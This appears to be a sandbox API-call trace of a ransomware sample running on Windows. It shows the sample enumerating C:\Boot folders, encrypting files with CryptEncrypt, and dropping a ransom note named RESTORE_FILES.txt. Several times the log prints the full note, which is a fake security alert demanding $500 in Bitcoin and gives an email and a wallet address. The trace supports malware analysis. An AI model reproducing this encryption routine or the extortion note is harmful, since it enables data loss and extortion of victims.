lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.718] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\..") returned 20 [0044.718] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.718] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.718] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.718] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.718] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.718] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.718] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.718] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.718] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0044.718] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.718] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.718] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.718] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.718] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.718] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.718] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.718] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\RESTORE_FILES.txt") returned 35 [0044.719] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\RESTORE_FILES.txt" (normalized: "c:\\boot\\pt-br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.719] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.719] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.719] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.719] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.719] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.720] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.720] CloseHandle (hObject=0xac) returned 1 [0044.720] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.720] lstrcmpiW (lpString1="pt-PT", lpString2="Windows") returned -1 [0044.720] lstrcmpiW (lpString1="pt-PT", lpString2="Program Files") returned 1 [0044.720] lstrcmpiW (lpString1="pt-PT", lpString2="Program Files (x86)") returned 1 [0044.720] lstrcmpiW (lpString1="pt-PT", lpString2="$Recycle.bin") returned 1 [0044.720] lstrcmpiW (lpString1="pt-PT", lpString2="System Volume Information") returned -1 [0044.720] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0044.720] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0044.720] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0044.720] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\*") returned 19 [0044.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.720] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.720] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.720] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.720] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.720] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.720] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\.") returned 19 [0044.720] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.720] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.721] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.721] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.721] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.721] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.721] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.721] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\..") returned 20 [0044.721] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.721] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.721] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.721] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.721] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.721] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.721] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.721] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.721] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0044.721] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.721] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.721] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.721] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.721] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.722] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.722] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.722] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\RESTORE_FILES.txt") returned 35 [0044.722] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\RESTORE_FILES.txt" (normalized: "c:\\boot\\pt-pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.722] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.722] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.723] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.723] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.723] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.723] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.723] CloseHandle (hObject=0xac) returned 1 [0044.723] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.723] lstrcmpiW (lpString1="ru-RU", lpString2="Windows") returned -1 [0044.723] lstrcmpiW (lpString1="ru-RU", lpString2="Program Files") returned 1 [0044.723] lstrcmpiW (lpString1="ru-RU", lpString2="Program Files (x86)") returned 1 [0044.724] lstrcmpiW (lpString1="ru-RU", lpString2="$Recycle.bin") returned 1 [0044.724] lstrcmpiW (lpString1="ru-RU", lpString2="System Volume Information") returned -1 [0044.724] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0044.724] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0044.724] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0044.724] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\*") returned 19 [0044.724] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.724] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.724] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.724] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.724] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.724] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.724] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\.") returned 19 [0044.724] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.724] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.724] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.724] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.724] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.724] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.724] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.724] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\..") returned 20 [0044.724] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.724] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.724] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.724] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.724] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.724] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.724] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.724] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.724] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0044.724] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.724] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.724] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.724] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.724] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.725] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.725] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.725] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\RESTORE_FILES.txt") returned 35 [0044.725] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\RESTORE_FILES.txt" (normalized: "c:\\boot\\ru-ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.725] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.725] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.726] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.726] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.726] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.726] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.726] CloseHandle (hObject=0xac) returned 1 [0044.726] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.726] lstrcmpiW (lpString1="sv-SE", lpString2="Windows") returned -1 [0044.726] lstrcmpiW (lpString1="sv-SE", lpString2="Program Files") returned 1 [0044.726] lstrcmpiW (lpString1="sv-SE", lpString2="Program Files (x86)") returned 1 [0044.726] lstrcmpiW (lpString1="sv-SE", lpString2="$Recycle.bin") returned 1 [0044.726] lstrcmpiW (lpString1="sv-SE", lpString2="System Volume Information") returned -1 [0044.726] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0044.726] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0044.726] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0044.726] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\*") returned 19 [0044.726] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.726] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.726] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.726] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.726] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.726] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.726] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\.") returned 19 [0044.726] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.726] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.726] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.726] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.727] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.727] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.727] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.727] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\..") returned 20 [0044.727] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.727] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.727] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.727] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.727] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.727] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.727] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.727] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.727] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0044.727] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.727] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.727] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.727] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.727] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.728] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.728] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.728] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\RESTORE_FILES.txt") returned 35 [0044.728] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\RESTORE_FILES.txt" (normalized: "c:\\boot\\sv-se\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.730] lstrlenA (lpString="! SYSTEM SECURITY ALERT 